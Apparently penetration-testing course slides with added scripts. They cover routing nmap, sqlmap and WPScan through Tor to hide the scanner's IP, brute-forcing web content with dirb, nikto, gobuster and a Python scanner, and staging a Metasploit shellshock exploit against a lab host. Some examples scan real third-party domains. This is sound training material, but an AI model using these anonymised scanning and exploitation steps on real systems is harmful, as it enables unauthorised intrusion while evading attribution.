The second command prints (echo) the content of the 'temp' variable from the first command, then searches for a path (letters, digits, '/', '_', '.' and '-') ending with '_en-US.tar.xz'; from those results only the last line is chosen and assigned to the variable 'temp2'
2. temp2=`echo "${temp}" | grep -E -o '[A-Za-z0-9/_.-]+_en-US.tar.xz' | tail -n 1`

Before going further, let's run the first and second commands and see what the result is
• temp="$(curl -s https://www.torproject.org/download/languages/)" && temp2=`echo "${temp}" | grep -E -o '[A-Za-z0-9/_.-]+_en-US.tar.xz' | tail -n 1`
Since the output of the two commands is stored in the variable 'temp2', we will not see anything on screen. To see the value of the 'temp2' variable, type the following command
• echo $temp2

From the 1st and 2nd commands we have the variable 'temp2'. This variable is used in the 3rd command, which downloads Tor Browser and saves the file as 'tor-browser-linux64.tar.xz'
3. wget -O tor-browser-linux64.tar.xz "https://www.torproject.org$temp2"

After running the first 3 commands, the downloaded Tor Browser archive must be in our current folder. Let's check the content of the current folder
• ls -la

If you have the file 'tor-browser-linux64.tar.xz' in the current folder, then execution of the first three commands was successful.

The 4th command extracts the content of the downloaded archive into the current folder
4. tar xvfJ tor-browser-linux64.tar.xz

Note. If you want to minimize screen output during extraction, remove the 'v' option from the command.

The 5th command removes the downloaded Tor Browser archive from the current folder. The '-f' option suppresses the prompt for file deletion

5. rm -f tor-browser-linux64.tar.xz

The 6th command moves the whole content of the Tor Browser 'Browser' folder to the new location 'tor' in the user's home folder

6. mv tor-browser*/Browser/ ~/tor

The final, 7th command cleans up the 'leftovers' of the Tor Browser archive extraction. Note that the glob 'tor-browser*' matches anything in the current folder with that prefix, not only the extracted directory, so run the one-liner from an empty working directory

7. rm -rf tor-browser*
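The seven-command pipeline above, rewritten as an added example (not from the slides or the Tor Project) that keeps the same scrape-then-download flow but verifies the bundle's detached GPG signature before extracting it and never runs 'rm -rf' on a glob in a shared directory. Assumptions: the download page still links Linux bundles whose file name contains 'tor-browser-linux' and ends in '.tar.xz', the signature is at the same URL plus '.asc', and the signing key is the Tor Browser Developers key whose fingerprint is printed on the project's signature-verification page (check it there before trusting the value below). The HTML snippet used to exercise the link extraction is constructed, and the function names are chosen here.

```shell
#!/bin/sh
# Added example, not from the slides or the Tor Project: download the latest
# Linux Tor Browser bundle, verify its signature, then install it under ~/tor.
# Assumptions: bundle links look like ".../tor-browser-linux...tar.xz", the
# detached signature is "<bundle URL>.asc", and the key below is the Tor
# Browser Developers signing key (verify the fingerprint on torproject.org).
set -eu

TOR_SIGNING_KEY="EF6E286DDA85EA2A4BA7DE684E2C6E8793298290"
DOWNLOAD_PAGE="https://www.torproject.org/download/languages/"

# Pull the last Linux bundle path out of the download page's HTML (stdin).
# Pure text processing, so it can be exercised on the constructed page below.
latest_bundle_path() {
    grep -E -o 'href="[^"]*tor-browser-linux[^"]*\.tar\.xz"' \
        | sed 's/^href="//; s/"$//' | tail -n 1
}

# Constructed sample of the download page (not fetched from anywhere).
SAMPLE_PAGE='<a href="/dist/torbrowser/12.0/tor-browser-linux64-12.0_ALL.tar.xz">old</a>
<a href="/dist/torbrowser/12.5/tor-browser-linux64-12.5_ALL.tar.xz.asc">sig</a>
<a href="/dist/torbrowser/12.5/tor-browser-linux64-12.5_ALL.tar.xz">new</a>'

install_tor_browser() {        # usage: install_tor_browser [DEST]  (default ~/tor)
    dest=${1:-$HOME/tor}
    if [ -e "$dest" ]; then echo "$dest already exists" >&2; return 1; fi
    path=$(curl -fsS "$DOWNLOAD_PAGE" | latest_bundle_path)
    if [ -z "$path" ]; then echo "no bundle link found on $DOWNLOAD_PAGE" >&2; return 1; fi
    url="https://www.torproject.org$path"
    tmp=$(mktemp -d)               # private scratch dir: no globbing in $PWD
    wget -q -O "$tmp/tb.tar.xz" "$url"
    wget -q -O "$tmp/tb.tar.xz.asc" "$url.asc"
    # Import the signing key if absent, then refuse to extract unsigned bundles.
    gpg --list-keys "$TOR_SIGNING_KEY" >/dev/null 2>&1 \
        || gpg --keyserver hkps://keys.openpgp.org --recv-keys "$TOR_SIGNING_KEY"
    gpg --verify "$tmp/tb.tar.xz.asc" "$tmp/tb.tar.xz"
    tar -xJf "$tmp/tb.tar.xz" -C "$tmp"
    mkdir -p "$(dirname "$dest")"
    mv "$tmp"/tor-browser*/Browser "$dest"
    rm -rf "$tmp"
    echo "Tor Browser installed to $dest"
}

# Only install when explicitly asked, so the file can be sourced for the helper.
if [ "${TOR_INSTALL:-0}" = "1" ]; then
    install_tor_browser "$@"
fi
```

Run with 'TOR_INSTALL=1 sh install-tor.sh'; a signature mismatch or a missing key aborts before 'tar' runs. The 'hkps://keys.openpgp.org' keyserver is one public option; the fingerprint itself is what you must confirm against the Tor Project's own page.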
Tor Browser - usage
Before using the Tor Browser, it is reasonable to verify the installation location and the permissions of the files and folders
• ls -la ~/tor/

The latest Tor Browser refuses to run with 'root' user permissions. To run it as root in this lab, we have to make a small adjustment to the Tor launcher file "~/tor/start-tor-browser" and comment out the code that checks for root (the slide shows the lines to comment out and the result of the change). Outside the lab, run Tor Browser as an unprivileged user instead: a browser exploit in a root-owned browser hands the attacker the whole machine.

Since the Tor Browser is a graphical program, it must be executed from a graphical environment.
Open 10.XX.32.2:5901 in a VNC viewer

Open a Kali Linux terminal and execute the following program

• ~/tor/start-tor-browser

If you see the following screen, click on the 'Connect' button to start using the Tor Browser

If you run the Tor Browser for the first time, the required configuration will be loaded

To verify that Tor Browser is working properly, open the 'ipleak.net' site.

If you do not see your own external IP address, Tor Browser is working properly.

Congratulations!

By using the Kali Linux command line, you have downloaded the latest version of the Tor Browser, extracted the archive, moved it to a custom location and cleaned up the files and folders after the download.

You have successfully installed Tor Browser.
Anonymous scanning through Tor
Anonymity is a very complex problem that not be
solved in a single document. Before starting real action,
you must double-check everything in the laboratory
environment.

In this course, we will learn you how hide your real IP


address while scanning by Nmap, sqlmap or WPScan.
We will use Tor to route Nmap, sqlmap or WPScan
traffic.

www.cybexer.com 130
Anonymous scanning through Tor
Let's install 'Tor' in Kali Linux. In terminal window type
in following command
• apt-get -y install torsocks tor

www.cybexer.com 131
Anonymous scanning through Tor
Main 'Tor' configuration file located here
'/etc/tor/torrc'. For proper anonymity we have to add
new 3 configuration options:
AutomapHostsOnResolve - mapping of unused virtual
addresses
DNSPort - port for DNS UDP requests
TransPort - port for transparent proxy connections

www.cybexer.com 132
Anonymous scanning through Tor
Let's append new options to 'Tor' configuration file
• echo 'AutomapHostsOnResolve 1' >> /etc/tor/torrc
• echo 'DNSPort 53530' >> /etc/tor/torrc
• echo 'TransPort 9040' >> /etc/tor/torrc

www.cybexer.com 133
Anonymous scanning through Tor
Verify the configuration changes with the 'tail' command.
Since we appended the new options to the end of the file,
printing only the last 10 lines is enough
• tail -n10 /etc/tor/torrc

Anonymous scanning through Tor
Now enable the 'Tor' service so that it starts at boot
• systemctl enable tor

And finally, start the main 'Tor' process
• systemctl start tor

Anonymous scanning through Tor
After starting 'Tor', verify that it is actually running and
listening. Check the 'tor' network connections with the
'netstat' command (on systems without 'netstat', 'ss'
accepts the same '-tulpn' flags). You should see the
SOCKS port 9050 plus the DNSPort and TransPort we
configured, all bound to 127.0.0.1
• netstat -tulpna |grep tor

Anonymous scanning through Tor
Or check the status of Tor with the 'systemctl' command
• systemctl status tor

Anonymous scanning through Tor
Now that the 'Tor' service is running, we can check that
it works with the 'ProxyChains-NG' program.

'ProxyChains-NG' is a tool that redirects the connections
of a program through SOCKS/HTTP proxies. It does this by
preloading a library that hooks the libc socket functions
(such as connect()) of the wrapped program; keep this in
mind, because anything that does not go through those
functions is not proxied.

The usage is straightforward - put 'proxychains4' in front
of the desired command to redirect its traffic through the
'Tor' network. Kali's default '/etc/proxychains4.conf'
already points at Tor's SOCKS port (127.0.0.1 9050).

Anonymous scanning through Tor
First, check our real external IP address
• curl ipinfo.io

Anonymous scanning through Tor
Let's install 'proxychains4' from the Kali Linux repository
• apt-get -y install proxychains4

Anonymous scanning through Tor
Now check our external IP address through the 'Tor'
network. It must differ from the address shown before
• proxychains4 curl ipinfo.io

Anonymous scanning through Tor
As you can see, 'proxychains4' prints a lot of diagnostic
output on stderr. To suppress it, redirect stderr
• proxychains4 curl ipinfo.io 2>/dev/null

Or use the '-q' (quiet) option
• proxychains4 -q curl ipinfo.io

Anonymous scanning through Tor
By default, 'Tor' randomly selects the entry (guard) node,
the intermediate node and the exit node. New circuits are
built after each 'Tor' service restart (the entry guard is
deliberately kept across restarts, the other hops change).
To limit 'Tor' exit nodes to specific countries, add the
following line to the configuration file (comma-separated
two-letter country codes in curly braces)
• echo 'ExitNodes {se}, {nl}, {ch}, {fr}' >> /etc/tor/torrc
And restart the 'Tor' service
• service tor restart

Keep in mind that restricting exit countries shrinks the
set of exits you can appear from, which makes your traffic
easier to correlate; use it only when an engagement
requires a specific exit location.

Anonymous scanning through Tor
Now check your external IP address again
• proxychains4 curl ipinfo.io 2>/dev/null

You can test further by restarting the 'Tor' service and
running the 'proxychains4' command again

Anonymous scanning through Tor
There might be situations where you want to exclude
certain countries from the 'Tor' chain completely.
To do that, use the 'ExcludeNodes' option followed by the
country codes to exclude
• echo 'ExcludeNodes {ru}, {by}, {cn}, {ua}' >> /etc/tor/torrc

By default Tor treats 'ExcludeNodes' as a preference that
it may override to keep working; add 'StrictNodes 1' if
the exclusion must be enforced.

After any configuration change, you must restart the 'Tor'
service

Anonymous scanning through Tor
When scanning with 'Nmap' through the 'Tor' network you
have to be very careful about which scan type you use.
'proxychains4' can only redirect connections that the
program makes through the libc socket functions. A SYN
scan ('-sS') is sent with raw sockets, so the probes leave
your machine directly and your real IP address is leaked
to the target. The same applies to every other raw-packet
feature: UDP and the other stealth scan types, OS
detection ('-O'), '--traceroute', '-A' (which implies both)
and host discovery pings (disable them with '-Pn'). Only
the TCP connect scan ('-sT') goes through the proxy.
Let's see what happens when we run 'nmap' with the '-sS'
option.

Anonymous scanning through Tor
Open a new Kali Linux terminal and start a network packet
capture for traffic to the target
• tcpdump -n -i eth0 -s0 host 94.154.144.4 and port 443

Anonymous scanning through Tor
On the machine where we initiate the port scan, run
'proxychains4' with 'nmap' and the SYN scan option
• proxychains4 nmap -sS -PN -sV --open -n -p 443 94.154.144.4 2>/dev/null

Anonymous scanning through Tor
Now check the 'tcpdump' output.
We can clearly see SYN packets going from our attacking
machine's own IP address straight to the target: the
address was revealed.

Anonymous scanning through Tor
Next, run 'nmap' with the connect scan, using the '-sT'
option
• proxychains4 nmap -sT -PN -sV --open -n -p 443 94.154.144.4 2>/dev/null

Anonymous scanning through Tor
Running 'nmap' with the '-sT' option did not reveal the
attacking machine's external IP address: 'tcpdump' shows
no packets from our interface to the target, because the
connections are made by the Tor exit node.

Anonymous scanning through Tor
If you run 'nmap' through 'proxychains4' against a
hostname instead of the target's IP address, you might
see the error 'nmap: netutil.cc:1319: int
collect_dnet_interfaces(const intf_entry*, void*):
Assertion `rc == 0' failed.'
• proxychains4 nmap -sT -PN -sV -v -A -T4 -p 80 cnn.com

Note that this command also uses '-A', which enables OS
detection and traceroute and therefore leaks your address
as described above; it is shown here only to reproduce
the error.

Anonymous scanning through Tor
To fix that problem there are two options
- scan the IP address rather than the hostname (and keep
'-n' so that 'nmap' does not resolve names itself)
- or comment out the 'proxy_dns' option in
'/etc/proxychains4.conf'
• sed -i 's/^proxy_dns/#proxy_dns/g' /etc/proxychains4.conf

Be aware that with 'proxy_dns' disabled, any name
resolution done by the wrapped program goes to your
normal DNS server and is visible outside Tor.

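The following script is an added example for this section (it is not part of the original course material): it lints an nmap command line for the raw-packet features listed above before wrapping it in 'proxychains4', so that a SYN scan, OS detection, host-discovery pings, nmap's own DNS resolution or a hostname target is refused instead of silently leaking your address. The flag tables follow nmap's documented scan types; the sample command lines are constructed (203.0.113.10 is a documentation-range address and 'example.com' stands in for any hostname).

```python
"""Lint an nmap command line before running it under proxychains4.

proxychains only intercepts libc socket calls such as connect(); anything nmap
sends with raw sockets (SYN/UDP/stealth scans, OS detection, traceroute, host
discovery pings) and anything it resolves with its own DNS code leaves the
machine directly and reveals the real IP address.
"""
import shlex

# nmap scan-type letters (the X in -sX) that are implemented with raw packets.
RAW_SCAN_TYPES = {
    "S": "TCP SYN scan", "U": "UDP scan", "A": "TCP ACK scan",
    "W": "TCP Window scan", "M": "TCP Maimon scan", "N": "TCP Null scan",
    "F": "TCP FIN scan", "X": "TCP Xmas scan", "O": "IP protocol scan",
    "Y": "SCTP INIT scan", "n": "ping scan",
}
# Other options that generate raw packets.
RAW_OPTIONS = {
    "-O": "OS detection",
    "-A": "aggressive mode (implies -O and --traceroute)",
    "--traceroute": "traceroute",
}
NO_PING = {"-Pn", "-PN", "-P0"}          # -PN and -P0 are the old spellings of -Pn
# Options whose next argument is a value, not a target.
OPTIONS_WITH_VALUE = {
    "-p", "-e", "-S", "-D", "-g", "-iL", "-oN", "-oX", "-oG", "-oA",
    "--script", "--script-args", "--source-port", "--max-retries",
    "--min-rate", "--max-rate", "--host-timeout", "--scan-delay",
}


def lint_nmap_for_proxychains(cmdline):
    """Return a list of problems; an empty list means the scan stays inside the proxy."""
    args = shlex.split(cmdline)
    if args and args[0] == "nmap":
        args = args[1:]
    problems, scan_types, targets = [], [], []
    no_ping = no_dns = False
    skip_next = False
    for arg in args:
        if skip_next:
            skip_next = False
            continue
        if arg in OPTIONS_WITH_VALUE:
            skip_next = True
        elif arg in RAW_OPTIONS:
            problems.append(f"{arg}: {RAW_OPTIONS[arg]} uses raw packets and bypasses the proxy")
        elif arg.startswith("-s") and not arg.startswith("--"):
            for letter in arg[2:]:           # nmap allows combined letters such as -sSU
                scan_types.append(letter)
                if letter in RAW_SCAN_TYPES:
                    problems.append(f"-s{letter}: {RAW_SCAN_TYPES[letter]} uses raw packets and bypasses the proxy")
        elif arg in NO_PING:
            no_ping = True
        elif arg.startswith("-P"):
            problems.append(f"{arg}: host-discovery probes are raw packets; use -Pn instead")
        elif arg == "-n":
            no_dns = True
        elif not arg.startswith("-"):
            targets.append(arg)
    if "T" not in scan_types:
        problems.append("no -sT given: as root nmap defaults to a SYN scan; add -sT")
    if not no_ping:
        problems.append("add -Pn: host discovery (ICMP/ARP/TCP pings) is sent directly")
    if not no_dns:
        problems.append("add -n: nmap resolves names with its own resolver, not through the proxy")
    for target in targets:
        if any(c.isalpha() for c in target):
            problems.append(f"{target}: hostname target; resolve it yourself and pass the IP address")
    return problems


def proxied_command(cmdline):
    """Return the proxychains4 wrapper for a command that passed the lint, else raise."""
    problems = lint_nmap_for_proxychains(cmdline)
    if problems:
        raise ValueError("refusing to proxy this scan:\n  " + "\n  ".join(problems))
    return "proxychains4 -q " + cmdline


if __name__ == "__main__":
    # Constructed sample command lines; 203.0.113.10 is a documentation-range address.
    for cmd in ("nmap -sS -Pn -sV --open -n -p 443 203.0.113.10",
                "nmap -sT -Pn -sV -v -A -T4 -p 80 example.com",
                "nmap -sT -Pn -sV --open -n -p 443 203.0.113.10"):
        print(cmd, "->", lint_nmap_for_proxychains(cmd) or "OK")
```

Run the string returned by proxied_command(); a scan that fails the lint raises ValueError with the reasons. This does not replace the 'tcpdump' check shown above, which remains the authoritative test that nothing leaves the interface directly.
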
Anonymous scanning through Tor
'sqlmap' anonymous scanning through the 'Tor' network.

'sqlmap' has a --proxy option, so you just need to append
--proxy socks5://127.0.0.1:9050 to your command (sqlmap
also has a built-in --tor switch that does the same)

• sqlmap -u TARGET --proxy socks5://127.0.0.1:9050

Anonymous scanning through Tor
'WPScan' anonymous scanning through the Tor network.

WPScan has a similar --proxy flag, so just append
--proxy socks5://127.0.0.1:9050 to your normal command
(WPScan 3 takes the target with --url; the old 2.x syntax
was -u)
• wpscan --url TARGET -e p,vt,u --proxy socks5://127.0.0.1:9050
Note. If scanning through Tor is slow and requests time
out, it is recommended to add the --request-timeout 500
--connect-timeout 120 options

DIRB, NIKTO, GOBUSTER
DIRB - overview
DIRB is a web content scanner. It looks for existing
(and/or hidden) web objects by launching a dictionary
based attack against a web server and analysing the
responses.

It comes with a set of preconfigured attack wordlists for
easy usage, but you can also use your own custom wordlists.

DIRB - usage
'dirb' is a command-line tool. If you run it from a Linux
terminal window without any options, it displays its help
• dirb

DIRB - usage
To scan a web server, provide its hostname or IP address.
Be sure to use the full URL format with the HTTP or HTTPS
scheme
• dirb http://srv.studentXX.csirt.crp/

DIRB - usage
If the target web server is not on the standard port 80 or
443, put the port number in the URL
http://10.XX.32.5:8080/

If you want to scan a specific folder of the web target,
add the folder name to the URL
http://10.XX.32.5:8080/project/

DIRB - usage
By default, 'dirb' uses its own medium-size wordlist,
located at '/usr/share/dirb/wordlists/common.txt'. This
wordlist has over 4500 entries.
'dirb' ships several wordlists:
'/usr/share/dirb/wordlists/big.txt' with over 20000
entries and '/usr/share/dirb/wordlists/small.txt' with
900+ entries.

DIRB - usage
To use several wordlists, append them (comma-separated)
after the URL
• cd /usr/share/dirb/wordlists
• dirb http://10.XX.32.5/ ./small.txt,./big.txt

DIRB - usage
By default, when 'dirb' finds a folder on the target web
server, it applies the same dictionary to that folder, and
if new folders are found inside it, 'dirb' scans them as
well. This default behaviour is very noisy (and slow on
large sites). To limit the search to a single level, use
the '-r' option, which disables recursive crawling
• dirb http://10.XX.32.5/ -r

DIRB - usage
There might be situations where you need to look for
files with specific extensions on the target server. The
'-X' parameter followed by the extension name(s) appends
each extension to every word in the wordlist
• dirb http://10.21.32.5/ -X .php,.pl,.txt

DIRB - usage
If you need to scan the target server with a delay
between requests, add the '-z' option followed by the
number of milliseconds
• dirb http://10.XX.32.5/ -z 1356 -r

DIRB - usage
For better readability and future reference, you can save
the output of the 'dirb' scan to a file. To do this, use
the '-o' parameter followed by the file name
• dirb http://10.XX.32.5/ -r -o output.txt

DIRB - usage
To stop listing files or folders that return an HTTP
response code you are not interested in, use the '-N'
option followed by the 3-digit response code
• dirb http://10.XX.32.5/ -r -N 403

DIRB - usage
If the target site uses HTTP basic authentication, use the
'-u' option followed by a colon-separated username and
password
• dirb http://10.XX.32.5/ -r -u user:pass

DIRB - usage
Some web sites serve different content based on the
browser's User-Agent string. To change the default
User-Agent string, use the '-a' option
• dirb http://10.XX.32.5/ -r -a 'Mozilla/5.0 (Linux; Android 6.0.1; E6653 Build/32.2.A.0.253) Chrome/52.0.2743.98'

DIRB - usage
In some environments, the web site may only be reachable
through a proxy server. The '-p' option followed by the
proxy server's IP address and port number sends all
requests through that proxy.
• dirb http://10.XX.32.5/ -r -p 127.0.0.1:3128

DIRB - usage
If the proxy server requires a username and password, add
the '-P' option followed by the proxy credentials
• dirb http://10.XX.32.5/ -r -p 127.0.0.1:3128 -P proxy_user:proxy_pass

NIKTO
NIKTO
NIKTO - web server vulnerability scanner.
An advanced scanner that identifies different weaknesses
in a web server:
• Web server and software misconfigurations
• Default files and programs
• Insecure files and programs
• Outdated servers and programs

NIKTO - usage
For a basic scan of a web server, supply its IP address or
hostname and the port
• nikto -h 10.XX.32.5 -p 80

NIKTO - usage
You can also specify the target site in URL notation
• nikto -h http://10.XX.32.5/

NIKTO - usage
For scanning an HTTPS web server, supply its IP address or
hostname and port and use the '-ssl' option
• nikto -h 10.XX.32.4 -p 443 -ssl

NIKTO - usage
To scan several ports, write them comma-separated after
the '-p' option.
• nikto -h 10.XX.32.5 -p 80,8080,8081

NIKTO - usage
By default, 'nikto' uses the User-Agent specified in its
configuration file '/etc/nikto.conf'
• grep -A 5 -B5 USERAGENT /etc/nikto.conf

NIKTO - usage
Some IDS/WAF systems block requests that carry a scanner's
default User-Agent (to stop the most obvious script-kiddie
activity). 'nikto' allows you to change its User-Agent
with the '-useragent' option followed by a custom string
• nikto -h http://10.XX.32.5/ -useragent "IOS 5.0, iPad 2022 generation"

GOBUSTER
GOBUSTER - installation
Kali Linux has 'gobuster' in its repository. To install it,
run the following command in your terminal
• apt-get install gobuster

GOBUSTER - usage
To scan a target web server, specify the URL of the host
and the path to the dictionary file
• gobuster dir -u http://10.XX.32.5/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt

GOBUSTER - usage
If you only want to see certain HTTP response codes, use
the '-s' option followed by the code number(s)
(comma-separated). On gobuster 3.2 and later, '-s'
conflicts with the default status-code blacklist, so add
-b '' as well
• gobuster dir -u http://10.XX.32.5/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt -s 200,401,403

GOBUSTER - usage
Like 'nikto', 'gobuster' sends its own User-Agent string
('gobuster/3.1.0' for that version). To change it, use the
'-a' option followed by a custom User-Agent string
• gobuster dir -u http://10.XX.32.5/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt -a "Firefox 3.0"

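As an added example (not part of the original course material, and not code from dirb or gobuster), the following Python script implements the mechanism the 'dirb' and 'gobuster dir' slides above describe: it builds candidate names from a wordlist and extensions, probes each one, filters unwanted response codes, and re-requests hits with a trailing slash to decide whether to descend into them. The HTTP part mirrors dirb's '-a', '-u' and '-p' options; the scan logic takes the probe function as a parameter, so the demonstration runs against a constructed fake site ('http://target.test' with a handful of hard-coded paths) instead of a live server.

```python
"""Dictionary-based web content discovery in the style of dirb/gobuster.

The network part is isolated in http_probe() so the scan logic can be
exercised against a constructed fake site without any server.
"""
import base64
import time
import urllib.error
import urllib.request


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Report 3xx codes instead of following them: a 301 to 'name/' is how a directory shows itself."""
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def http_probe(url, user_agent="Mozilla/5.0", auth=None, proxy=None, timeout=10):
    """Return the HTTP status code for url, or None if the request failed."""
    handlers = [_NoRedirect()]
    if proxy:                                       # like dirb -p / gobuster --proxy
        handlers.append(urllib.request.ProxyHandler({"http": proxy, "https": proxy}))
    headers = {"User-Agent": user_agent}            # like dirb -a / gobuster -a
    if auth:                                        # like dirb -u user:pass
        headers["Authorization"] = "Basic " + base64.b64encode(auth.encode()).decode()
    request = urllib.request.Request(url, headers=headers)
    try:
        with urllib.request.build_opener(*handlers).open(request, timeout=timeout) as resp:
            return resp.status
    except urllib.error.HTTPError as err:
        return err.code
    except (urllib.error.URLError, OSError):
        return None


def candidates(words, extensions=()):
    """Yield each word, then word+ext for every extension (dirb -X)."""
    for word in words:
        word = word.strip()
        if not word or word.startswith("#"):
            continue
        yield word
        for ext in extensions:
            yield word + ext


def scan(base_url, words, probe=http_probe, extensions=(), ignore_codes=(404,),
         recursive=True, delay_ms=0):
    """Brute-force base_url with the wordlist and return {url: status_code}."""
    words = list(words)
    queue = [base_url if base_url.endswith("/") else base_url + "/"]
    found, seen = {}, set()
    while queue:
        directory = queue.pop(0)
        for name in candidates(words, extensions):
            url = directory + name
            if url in seen:
                continue
            seen.add(url)
            code = probe(url)
            if delay_ms:                               # dirb -z
                time.sleep(delay_ms / 1000)
            if code is None or code in ignore_codes:   # dirb -N / gobuster -b
                continue
            found[url] = code
            # A hit without a file extension may be a directory: dirb re-requests it
            # with a trailing slash and, unless -r was given, descends into it.
            if recursive and not name.endswith(tuple(extensions)):
                dir_code = probe(url + "/")
                if dir_code is not None and dir_code not in ignore_codes:
                    found[url + "/"] = dir_code
                    queue.append(url + "/")
    return found


# Constructed sample site for the offline demonstration (not a real host).
SAMPLE_SITE = {
    "/index.php": 200, "/admin": 301, "/admin/": 200,
    "/admin/config.php": 200, "/secret": 403, "/secret/": 403,
}
SAMPLE_WORDS = ["admin", "index", "secret", "config", "backup"]


def fake_probe(url):
    return SAMPLE_SITE.get(url[len("http://target.test"):], 404)


def demo(recursive=True, ignore_codes=(404,)):
    return scan("http://target.test", SAMPLE_WORDS, probe=fake_probe,
                extensions=(".php",), ignore_codes=ignore_codes, recursive=recursive)


if __name__ == "__main__":
    for url, code in sorted(demo().items()):
        print(code, url)
```

To scan a real host, call scan() with the default http_probe (wrap it with functools.partial to set user_agent, auth or proxy) and words=open('/usr/share/dirb/wordlists/common.txt'); recursive=False is the equivalent of dirb's '-r', and adding codes to ignore_codes is the equivalent of '-N'.
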
GOBUSTER - usage
In addition to web server scanning, 'gobuster' can do DNS
enumeration. To look for DNS subdomains, supply the domain
name and the path to a dictionary file
• gobuster dns -d cnn.com -w /usr/share/dnsenum/dns.txt

Metasploit
Metasploit - intro
Metasploit is an extremely robust and flexible
penetration testing framework with tons of tools to
perform various simple and complex tasks.

Metasploit - intro
Metasploit has various components, organised into
different module categories

Metasploit - intro
Auxiliaries - modules written to perform a specific task
(scanning, fuzzing, brute forcing) without delivering a
payload.

Some examples of auxiliaries:
auxiliary/admin/http/tomcat_administration - scans a
range of IP addresses and locates the Tomcat Server
administration panel and version
auxiliary/scanner/mysql/mysql_login - brute-force login
tool for MySQL servers
auxiliary/scanner/http/open_proxy - scans for open HTTP
proxies

Metasploit - intro
Exploits - the actual code that runs against the target
system to take advantage of a vulnerability.

Some examples of exploits:
windows/smb/ms17_010_eternalblue - ETERNALBLUE
exploit
unix/webapp/drupal_drupalgeddon2 - exploit for
Drupal CMS

Metasploit - intro
Payloads - the code that runs on the target after an
exploit succeeds (for example a command shell or
Meterpreter).

Some examples of payloads:
payload/generic/shell_reverse_tcp - generic reverse
TCP command shell
payload/php/reverse_php - reverse TCP PHP command
shell

Metasploit - intro
Encoders - various techniques and algorithms to
transform the payload so that it does not get detected
by antivirus software (note that modern AV engines
recognise the stock encoders easily).

Some examples of encoders:
encoder/cmd/powershell_base64 - PowerShell Base64
command encoder
encoder/cmd/perl - Perl command encoder

Metasploit - intro
POST (post-exploitation) - modules used after successful
exploitation for further information gathering, privilege
escalation and persistence on the compromised host.

Some examples of post modules:
post/linux/gather/enum_users_history - gather Linux
user history
post/windows/manage/install_ssh - install OpenSSH
on Windows

Metasploit - usage
Since Metasploit relies on a PostgreSQL database, before
the first run Metasploit must be configured to use it
• msfdb init

Metasploit - usage
If Metasploit is already configured, the initialisation
script will tell you so

• msfdb init

Metasploit - usage
Let's start Metasploit
• msfconsole

Metasploit - usage
It is important to keep Metasploit up to date. Check the
version in the MSF console
• version

Metasploit - usage
Check the database connectivity in the MSF console
• db_status

If the database is not running, 'db_status' will report
that there is no connection.

To start the PostgreSQL database, run the following
command in a Linux terminal
• service postgresql start

Metasploit - usage
To list the content of a category, use 'show' followed by
the category name, for example
• show encoders

Metasploit - usage
Search for a specific exploit/encoder/auxiliary etc.
• search ftp

Metasploit - usage
To get more precise search results, use a more specific
search query
• search windows printer

Metasploit - usage
Metasploit is a very powerful tool for various attack
phases - information gathering, scanning, exploitation
and post-exploitation.

Information gathering is the first and one of the most, if
not the most, important activities in penetration testing.
This step is carried out in order to find out as much
information about the target machine as possible.
The more information we have, the better our chances of
exploiting the target.

Metasploit - usage
There are two types of techniques used in information
gathering
Passive information gathering - gaining information about
the target without sending any traffic to it (public DNS
records, search engines, certificate transparency logs and
so on).

Active information gathering - connecting to the target in
order to gain information; the target can log these
connections.

Metasploit - usage
Let's do our first information gathering task.

Since DNS is one of the most important protocols on the
internet, we will do DNS record scanning and enumeration.

DNS enumeration is usually described as passive
information gathering because it queries public
infrastructure. Be aware, though, that 'enum_dns' sends
its queries (including zone transfer attempts) to the
domain's own name servers, where they can be logged.

Metasploit - usage
To load an 'auxiliary' module in the MSF console, we use
the 'use' command followed by the module name.

In the MSF console switch to the auxiliary module
'enum_dns'
• use auxiliary/gather/enum_dns

Metasploit - usage
To display information about the module, use the 'info'
command
• info

Metasploit - usage
To show only the module-specific options, use the
following command in the MSF console
• show options

Metasploit - usage
The module options table has the following columns:
Name - name of the variable
Current Setting - value of the variable
Required - whether the variable is required. If a required
variable is not set when the module is executed, an error
is shown
Description - description of the variable

Metasploit - usage
We can see that the 'DOMAIN' variable is required but
empty. Let's set a domain name for that variable
• set DOMAIN zonetransfer.me

Now if we run 'show options' again, we will see the
DOMAIN variable populated
• show options

Metasploit - usage
Depending on the environment and security rules, you
might have to set a custom DNS server.

• set NS 10.103.176.2

Metasploit - usage
Now we can run our DNS enumeration against the
'zonetransfer.me' domain. In the MSF console type 'run'
and hit 'Enter'
• run

Metasploit - usage
Now, let's examine the results of the DNS enumeration of
the 'zonetransfer.me' domain

Note. Instead of the 'run' command you can use 'exploit';
it is an alias, but looks cooler :)

Metasploit - usage
Next is active information gathering with Metasploit.
MSF has several port scanner modules. Let's see which
port scanning modules MSF has
• search portscan

Metasploit - usage
We start with a simple SYN port scan
• use auxiliary/scanner/portscan/syn

Metasploit - usage
Let's see which options are required for port scanning.
Type the following command in the MSF console
• show options

Metasploit - usage
As we can see, the only required option for port scanning
that is empty is 'RHOSTS'. RHOSTS stands for remote hosts.
RHOSTS can be a single IP address, a range of IP
addresses, a hostname or a CIDR block
• set RHOSTS 10.XX.32.5

To make the port scan run a bit faster, let's lower the
port range to 100 ports
• set PORTS 1-100

Metasploit - usage
After the target is set and the port range adjusted, we
can start scanning with the 'run' command
• run

Metasploit - usage
The auxiliary port scanning modules in 'scanner/portscan'
use MSF's built-in functions. They are not as efficient or
powerful as 'nmap'. MSF lets you scan targets with native
'nmap', with all its rich functionality, from inside the
console via the 'db_nmap' command, which also stores the
results in the database.

The syntax for running 'nmap' from Metasploit is exactly
the same as running 'nmap' from the Linux command line.

Metasploit - usage
Exploiting targets is done in this way

- select the exploit you want to use
- set the required options
- run the exploit against the target

Metasploit - usage
Search the Metasploit database for the required exploit.
In our case, we need to search for 'shellshock'. In the
'msfconsole' prompt run the following command
• search shellshock

Metasploit - usage
Since we do not yet know whether the target is vulnerable
to 'shellshock', we have to test it. Let's select that
exploit
• use exploit/multi/http/apache_mod_cgi_bash_env_exec

Metasploit - usage
Since each exploit can have several required options,
let's check them
• show options

Metasploit - usage
From the list of options we can see that 'RHOSTS' and
'TARGETURI' are required but not set. Let's set those
options
• set rhosts 10.XX.32.3
• set targeturi /cgi-bin/test.sh

Metasploit - usage
It's advised to verify the options again before running
the exploit against the target
• show options

